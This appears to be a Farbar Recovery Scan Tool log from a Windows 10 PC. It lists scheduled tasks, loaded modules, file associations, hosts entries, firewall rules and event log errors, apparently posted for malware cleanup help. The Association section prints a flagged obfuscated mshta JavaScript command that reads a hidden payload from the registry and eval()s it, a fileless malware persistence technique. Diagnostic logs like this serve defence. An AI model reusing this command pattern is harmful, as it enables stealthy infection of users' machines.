Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA1d041dfa521745e.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA1d08f0476acbae7.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\TrackerAutoUpdate.job => C:\Program Files\Tracker Software\Update\TrackerUpdate.exe
Task: C:\WINDOWS\Tasks\update-S-1-5-21-4142771536-1505296934-324239511-1000.job => C:\Program Files\Skillbrains\Updater\Updater.exe
Task: C:\WINDOWS\Tasks\update-sys.job => C:\Program Files\Skillbrains\Updater\Updater.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
Shortcut: C:\Users\admin\Favorites\NCH Software Download Site.lnk -> hxxp://www.nchsoftware.com/index.html
Shortcut: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ScenicReflections\Ultimate Christmas Scenic Reflections\Visit ScenicReflections.com.lnk -> hxxp://www.scenicreflections.com/
==================== Loaded Modules (Whitelisted) ==============
2016-07-16 11:25 - 2016-07-16 11:25 - 00190976 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02048496 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2011-03-14 18:27 - 2011-03-14 18:27 - 00271712 _____ () C:\ProgramData\DatacardService\HWDeviceService.exe
2014-01-28 13:02 - 2014-01-28 13:02 - 00007168 _____ () C:\Program Files\Aquila Technology\WOLAgent\WOLAgent.exe
2014-11-14 13:05 - 2014-11-14 13:03 - 00239968 _____ () C:\ProgramData\Digi Net Mobile\OnlineUpdate\ouc.exe
2014-11-14 13:05 - 2014-11-14 13:03 - 00011362 _____ () C:\ProgramData\Digi Net Mobile\OnlineUpdate\mingwm10.dll
2014-11-14 13:05 - 2014-11-14 13:03 - 00043008 _____ () C:\ProgramData\Digi Net Mobile\OnlineUpdate\libgcc_s_dw2-1.dll
2014-11-14 13:05 - 2014-11-14 13:03 - 02415104 _____ () C:\ProgramData\Digi Net Mobile\OnlineUpdate\QtCore4.dll
2014-11-14 13:05 - 2014-11-14 13:03 - 01148416 _____ () C:\ProgramData\Digi Net Mobile\OnlineUpdate\QtNetwork4.dll
2014-11-14 13:05 - 2014-11-14 13:03 - 00383488 _____ () C:\ProgramData\Digi Net Mobile\OnlineUpdate\QueryStrategy.dll
2014-11-14 13:05 - 2014-11-14 13:03 - 00398336 _____ () C:\ProgramData\Digi Net Mobile\OnlineUpdate\QtXml4.dll
2014-12-15 16:49 - 2014-12-15 16:46 - 00655712 _____ () C:\ProgramData\Mobile Partner\OnlineUpdate\ouc.exe
2014-12-15 16:49 - 2014-12-15 16:46 - 00011362 _____ () C:\ProgramData\Mobile Partner\OnlineUpdate\mingwm10.dll
2014-12-15 16:49 - 2014-12-15 16:46 - 00043008 _____ () C:\ProgramData\Mobile Partner\OnlineUpdate\libgcc_s_dw2-1.dll
2014-12-15 16:49 - 2014-12-15 16:46 - 02415104 _____ () C:\ProgramData\Mobile Partner\OnlineUpdate\QtCore4.dll
2014-12-15 16:49 - 2014-12-15 16:46 - 01148416 _____ () C:\ProgramData\Mobile Partner\OnlineUpdate\QtNetwork4.dll
2014-12-15 16:49 - 2014-12-15 16:46 - 00835072 _____ () C:\ProgramData\Mobile Partner\OnlineUpdate\QueryStrategy.dll
2014-12-15 16:49 - 2014-12-15 16:46 - 00398336 _____ () C:\ProgramData\Mobile Partner\OnlineUpdate\QtXml4.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02048496 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-08-26 09:28 - 2016-08-26 09:28 - 01383616 _____ () C:\Users\admin\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\ClientTelemetry.dll
2016-03-14 15:03 - 2016-03-14 15:03 - 04319232 _____ () C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll
2016-07-16 11:25 - 2016-07-16 11:25 - 00108032 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00321536 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-10-13 09:26 - 2016-10-05 12:10 - 06726656 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-10-13 09:26 - 2016-10-05 12:06 - 01149440 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00526848 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2016-10-13 09:26 - 2016-10-05 12:05 - 00779776 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-10-13 09:26 - 2016-10-05 12:05 - 01725440 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-10-13 09:26 - 2016-10-05 12:07 - 03158528 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2012-11-27 00:54 - 2012-11-27 00:54 - 00094208 _____ () C:\Windows\System32\IccLibDll.dll
2016-04-25 09:53 - 2014-11-18 14:44 - 00255072 _____ () C:\Program Files\EaseUS\EaseUS Partition Master 10.8\bin\TrayPopupE\TrayTipAgentE.exe
2016-04-25 09:53 - 2014-02-13 15:27 - 00222792 _____ () C:\Program Files\EaseUS\EaseUS Partition Master 10.8\bin\TrayPopupE\traynet.dll
2016-04-25 09:53 - 2014-02-13 15:27 - 00275528 _____ () C:\Program Files\EaseUS\EaseUS Partition Master 10.8\bin\TrayPopupE\libcurl.dll
2016-04-25 09:53 - 2014-02-13 15:27 - 00113166 _____ () C:\Program Files\EaseUS\EaseUS Partition Master 10.8\bin\TrayPopupE\zlib1.dll
2016-04-25 09:53 - 2014-02-13 15:27 - 00249928 _____ () C:\Program Files\EaseUS\EaseUS Partition Master 10.8\bin\TrayPopupE\uexper.dll
2016-07-07 12:20 - 2015-05-21 16:15 - 00883872 _____ () C:\Program Files\PDFConverter.com\PDF Converter Elite 4.0\platforms\qwindows.dll
2016-08-26 09:28 - 2016-08-26 09:28 - 00118976 _____ () C:\Users\admin\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\FileSyncViews.dll
2016-10-13 11:43 - 2016-10-13 11:43 - 00098816 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32api.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00110080 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\pywintypes27.dll
2016-10-13 11:43 - 2016-10-13 11:43 - 00364544 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\pythoncom27.dll
2016-10-13 11:43 - 2016-10-13 11:43 - 00320512 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32com.shell.shell.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00776704 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\_hashlib.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 01176576 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\wx._core_.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00806400 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\wx._gdi_.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00816128 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\wx._windows_.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 01067008 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\wx._controls_.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00733184 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\wx._misc_.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00682496 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\pysqlite2._sqlite.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00088064 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\_ctypes.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00119808 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32file.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00108544 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32security.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00007168 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\hashobjs_ext.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00017920 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\thumbnails_ext.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00088064 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\usb_ext.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00012800 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\common.time34.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00018432 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32event.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00167936 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32gui.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00046080 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\_socket.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 01208320 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\_ssl.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00128512 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\_elementtree.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00127488 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\pyexpat.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00038912 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32inet.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00036864 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\_psutil_windows.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00525208 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\windows._lib_cacheinvalidation.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00011264 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32crypt.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00077312 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\wx._html2.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00027136 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\_multiprocessing.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00020480 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\_yappi.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00035840 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32process.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00686080 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\unicodedata.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00078848 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\wx._animate.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00123392 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\wx._wizard.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00024064 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32pipe.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00010240 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\select.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00025600 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32pdh.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00017408 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32profile.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00022528 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32ts.pyd
2016-10-04 10:08 - 2016-09-25 06:47 - 01805416 _____ () C:\Program Files\Google\Chrome\Application\53.0.2785.143\libglesv2.dll
2016-10-04 10:08 - 2016-09-25 06:47 - 00093288 _____ () C:\Program Files\Google\Chrome\Application\53.0.2785.143\libegl.dll
2016-10-04 09:59 - 2016-10-04 10:01 - 00062464 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x86__kzf8qxf38zg5c\SkypeHost.exe
2016-10-04 09:59 - 2016-10-04 10:01 - 00151040 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x86__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2016-10-04 09:59 - 2016-10-04 10:01 - 27109376 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x86__kzf8qxf38zg5c\SkyWrap.dll
2016-10-12 08:59 - 2016-09-30 10:51 - 17769664 _____ () C:\Users\admin\AppData\Local\Google\Chrome\User Data\PepperFlash\23.0.0.185\pepflashplayer.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\Software\Classes\exefile: <===== ATTENTION
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\Software\Classes\.exe: => <===== ATTENTION
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\Software\Classes\07cXlht: mshta "javascript:QwtO8Ko1ub="8rD5R7BWXr";VC63=new ActiveXObject("WScript.Shell");sT83WVpF="jOE5Rw";QoK54P=VC63.RegRead("HKCU\\software\\488ad9a48f\\40a6d130");H4lqkarHs="Ld8BX";eval(QoK54P);O1nHxcaAw="WH";" <===== ATTENTION
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-14 05:04 - 2016-09-01 11:23 - 00000228 ___RA C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 localhost
127.0.0.1 thislineskipsanyemptylines
127.0.0.1 bandicam.com
127.0.0.1 ssl.bandisoft.com
127.0.0.1 thislineskipsanyemptylines
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 192.168.200.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-32bit] => (Allow) LPort=808
FirewallRules: [{4CD4689A-5727-4C28-8971-B5BA0999FB48}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{2CC70588-79B5-4C12-8823-AE5C776BF024}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{C32956EE-9A89-4658-A66D-0B064FF93D80}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe
FirewallRules: [{08B653DD-9FD4-43B2-9ED7-28C82E54FD96}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe
FirewallRules: [{D4EC22CB-47A9-4B89-B709-B9E0367D32A3}] => (Allow) C:\Users\user\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{3634081A-5DFD-46B1-8905-8C1B1853E2DE}] => (Allow) C:\Users\user\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{92233F84-7DCB-4F19-B6D8-F7E62AF6579C}] => (Allow) C:\Users\user\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{FEF6E7E9-49C3-4271-8FAC-7EC8BC829891}] => (Allow) C:\Users\user\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{29BD67E1-5DF4-443D-B784-8C877DAFD581}] => (Allow) C:\Users\user\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{17AA55AE-2893-4063-A120-8BA4660B1E41}] => (Allow) C:\Users\user\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{2A76D585-1BDC-4345-B9F2-91E608E3D0C7}] => (Allow) C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{943F8507-613E-4249-AD19-7B660D23C2CF}] => (Allow) C:\WINDOWS\explorer.exe
FirewallRules: [{B300D810-8F35-411D-80BC-0E12271BA750}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{51D06297-3DA0-4D62-9C7A-A10D668200C2}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{DA5F1496-B05A-4B1C-A2DD-FCC9B63E82DC}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe
FirewallRules: [{250EB19C-D0EB-4834-B8F9-FF9E05D5526D}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe
FirewallRules: [{05EE5532-EFC3-4C63-8156-465DAE2F1A08}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
FirewallRules: [{32CE4F39-41F6-458A-B286-DE4A5CB298EB}] => (Allow) C:\Program Files\Microsoft LifeCam\LifeCam.exe
FirewallRules: [{62E5B45D-6A39-41F5-8E10-1532C09E4979}] => (Allow) C:\Program Files\Microsoft LifeCam\LifeCam.exe
FirewallRules: [{FAC6C8BB-CC7A-4D92-B7DE-27BA98EA515C}] => (Allow) C:\Program Files\Microsoft LifeCam\LifeEnC2.exe
FirewallRules: [{C1C154E7-DE6A-4D86-B72B-BCABCB02138D}] => (Allow) C:\Program Files\Microsoft LifeCam\LifeEnC2.exe
FirewallRules: [{ADD07562-5827-4E93-B16A-DA95BB869A31}] => (Allow) C:\Program Files\Microsoft LifeCam\LifeExp.exe
FirewallRules: [{8CB9F83F-70FA-40FA-8B9D-C0DCC865D9A4}] => (Allow) C:\Program Files\Microsoft LifeCam\LifeExp.exe
FirewallRules: [{3FC4FEA1-9461-45CD-9DA9-87E2818A6489}] => (Allow) C:\Program Files\Microsoft LifeCam\LifeTray.exe
FirewallRules: [{46F468C7-30ED-4A0E-83FB-0BC29A4CC752}] => (Allow) C:\Program Files\Microsoft LifeCam\LifeTray.exe
FirewallRules: [TCP Query User{5465B48D-4E8B-49FF-9D76-623F5167DD96}C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe] => (Allow) C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe
FirewallRules: [UDP Query User{CEE92593-DBB1-4E77-B91D-E8210E6D2FE4}C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe] => (Allow) C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe
FirewallRules: [{01D5B1EA-7EF7-43EE-B108-F8880AB92735}] => (Allow) C:\Users\admin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{D7A37CA2-04F2-4B0F-8973-88FABAC040AB}] => (Allow) C:\Users\admin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{9DD9826C-8C7F-4793-8D43-CBB47EE619A6}] => (Allow) C:\Program Files\Skype\Phone\Skype.exe
FirewallRules: [{64520A03-ED28-4520-BE80-98E654049A63}] => (Allow) C:\Windows\system32\LMabcoms.exe
FirewallRules: [{D1F5DBD0-0BB9-4D45-B0B3-BB80990D7CC6}] => (Allow) C:\Program Files\MetaTrader-Admiral Markets\metatester.exe
FirewallRules: [TCP Query User{B7AC8F7A-A6CD-4698-9AE5-FC7095D5B889}C:\program files\netbeans 8.0.1\bin\netbeans.exe] => (Allow) C:\program files\netbeans 8.0.1\bin\netbeans.exe
FirewallRules: [UDP Query User{11ECD810-2567-45C4-8A49-04CCDF98CB17}C:\program files\netbeans 8.0.1\bin\netbeans.exe] => (Allow) C:\program files\netbeans 8.0.1\bin\netbeans.exe
FirewallRules: [{F6DE8EC5-B797-4F2C-9908-86ADA4DCB99B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{A3794D0F-7C33-4D77-881B-F4F21D605CE1}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{901D61D8-0F8B-4DA7-B67B-EF80DF08C812}C:\program files\mozilla firefox\firefox.exe] => (Allow) C:\program files\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{A4AC5E55-1A62-4EE2-8517-E7B16804D642}C:\program files\mozilla firefox\firefox.exe] => (Allow) C:\program files\mozilla firefox\firefox.exe
FirewallRules: [{F7E88328-3528-46ED-85FA-A3EF53727A3E}] => (Allow) C:\Program Files\Siber Systems\GoodSync\GoodSync.exe
FirewallRules: [{EF3C97DB-D160-4B9E-A9DA-3ECEA9F3C1F2}] => (Allow) C:\Program Files\Siber Systems\GoodSync\GoodSync.exe
FirewallRules: [{BADE5B48-25EC-4E05-B935-BE63209F288A}] => (Allow) C:\Program Files\Siber Systems\GoodSync\GsExplorer.exe
FirewallRules: [{B384E91E-6D80-436B-8627-1C3A5291A3D9}] => (Allow) C:\Program Files\Siber Systems\GoodSync\GsExplorer.exe
FirewallRules: [{53843B90-F874-4611-B402-9D3C0ED75982}] => (Allow) C:\Program Files\Siber Systems\GoodSync\Gs-Server.exe
FirewallRules: [{1EB4E975-7723-4670-A23A-A1F2A997AFBE}] => (Allow) C:\Program Files\Siber Systems\GoodSync\Gs-Server.exe
FirewallRules: [{593096DC-F9F0-4294-BD68-20DAD410045C}] => (Allow) LPort=33333
FirewallRules: [{92347BF4-0F43-4FFD-9C91-881B5C3D43C3}] => (Allow) LPort=33338
FirewallRules: [{F2D4ABF2-0226-4FBB-BF02-B1709840E303}] => (Allow) C:\Users\admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
FirewallRules: [{E459F547-6E94-4176-8A15-237E76884A0E}] => (Allow) LPort=8888
FirewallRules: [{21996C04-4EE9-4EE6-9AE4-479E6EB2C27B}] => (Allow) LPort=8888
FirewallRules: [{10E05A0B-28D3-420D-9278-6CFCEFEB5038}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe
==================== Restore Points =========================
13-10-2016 10:38:15 Windows Update
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (10/13/2016 11:36:20 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AcerTrMate-5744)
Description: Activation of app Microsoft.Getstarted_4.0.12.0_x86__8wekyb3d8bbwe:App.AppX7mv0s3r0wanj0n66dy6vax24ps6avzvz.mca failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (10/13/2016 11:16:40 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AcerTrMate-5744)
Description: Activation of app Microsoft.Getstarted_4.0.12.0_x86__8wekyb3d8bbwe:App.AppX7mv0s3r0wanj0n66dy6vax24ps6avzvz.mca failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (10/13/2016 10:38:37 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
System Error:
Access is denied.
.
Error: (10/12/2016 11:41:41 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "BITS" in DLL "C:\Windows\System32\bitsperf.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
Error: (10/11/2016 03:29:02 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AcerTrMate-5744)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (10/11/2016 03:29:02 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AcerTrMate-5744)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (10/11/2016 03:29:02 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AcerTrMate-5744)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (10/11/2016 03:29:02 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AcerTrMate-5744)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (10/11/2016 09:32:14 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AcerTrMate-5744)
Description: Activation of app Microsoft.ZuneVideo_8wekyb3d8bbwe!Microsoft.ZuneVideo failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (10/11/2016 09:32:10 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Video.UI.exe, version: 3.6.2506.0, time stamp: 0x57e95173
Faulting module name: Windows.UI.Xaml.dll, version: 10.0.14393.187, time stamp: 0x57cf9c3e
Exception code: 0xc000027b
Fault offset: 0x008b7a98
Faulting process id: 0x1d80
Faulting application start time: 0x01d223892e7398aa
Faulting application path: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_3.6.25061.0_x86__8wekyb3d8bbwe\Video.UI.exe
Faulting module path: C:\Windows\System32\Windows.UI.Xaml.dll
Report Id: a6e2bc30-27e3-4d56-af81-dcfe5eeca02d
Faulting package full name: Microsoft.ZuneVideo_3.6.25061.0_x86__8wekyb3d8bbwe
Faulting package-relative application ID: Microsoft.ZuneVideo
System errors:
=============
Error: (10/13/2016 11:42:45 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
and APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
Error: (10/13/2016 11:42:26 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Mobile Partner. RunOuc service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.
Error: (10/13/2016 11:42:26 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Mobile Partner. RunOuc service to connect.
Error: (10/13/2016 11:42:23 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Digi Net Mobile. RunOuc service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.
Error: (10/13/2016 11:42:23 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Digi Net Mobile. RunOuc service to connect.
Error: (10/13/2016 11:42:22 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The NetTcpActivator service depends on the NetTcpPortSharing service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
Error: (10/13/2016 11:41:40 AM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk1\DR1.
Error: (10/13/2016 11:41:35 AM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: DCOM got error "1084" attempting to start the service dps with arguments "Unavailable" in order to run the server:
{DDCFD26B-FEED-44CD-B71D-79487D2E5E5A}
Error: (10/13/2016 11:41:35 AM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: DCOM got error "1084" attempting to start the service dps with arguments "Unavailable" in order to run the server:
{DDCFD26B-FEED-44CD-B71D-79487D2E5E5A}
Error: (10/13/2016 11:41:35 AM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: DCOM got error "1084" attempting to start the service dps with arguments "Unavailable" in order to run the server:
{DDCFD26B-FEED-44CD-B71D-79487D2E5E5A}
CodeIntegrity:
===================================
Date: 2016-10-06 10:12:30.824
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume1\Windows\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.
